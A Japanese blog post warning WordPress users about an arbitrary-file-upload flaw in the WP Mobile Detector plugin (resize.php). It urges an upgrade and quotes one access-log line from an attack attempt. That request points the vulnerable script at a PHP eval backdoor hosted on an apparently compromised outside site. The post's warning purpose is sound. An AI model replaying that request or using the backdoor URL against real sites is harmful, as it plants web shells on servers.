WordPress用プラグインの「WP Mobile Detector」に任意のファイルをアップロードできる脆弱性があってこの脆弱性を試すログがあったので起稿しました。
どんな脆弱性かと言いますと、resize.php
の変数srcに悪意のあるコードが書かれたファイルのURLを指定するだけで権限が許せばそのファイルをバックドアとしてサーバ内に保存出来てしまうというもの。
現在公開されている、バージョン3.7ではFixされているようなのでその影響を受けないそうだがバージョン3.6より前のバージョンをお使いの方はバージョンアップ対応を是非ともお勧めする。
そのアクセスログを公開しますが、下記のような感じで攻撃を仕掛けている。
引数についているURLだが踏み台に使われているのだろうと思う、恐らく既にwww.nipponclub.org
は何らかの攻撃を受けているに違いない。
1 2 |
62.210.111.98 - - [19/Jun/2016:23:07:51 +0900] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.nipponclub.org/wp-content/themes/twentythirteen/inc/php.php HTTP/1.1" 404 261849 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36" "-" |
対象のファイルをwgetにてダウンロードし、PHPスクリプトの中身を精査してみたところ、POSTされた内容をPHPのevalで実行するようになっているので攻撃者はPOSTに好きなPHPコードを投入し悪用するものと思われる。
<参考サイト>
http://japan.zdnet.com/article/35083773/
https://www.jpcert.or.jp/wr/2016/wr162201.html#5
是非ともみなさん、WordPressを含めWEBのセキュリティ対策はしっかりと行っていただきますようお願いします。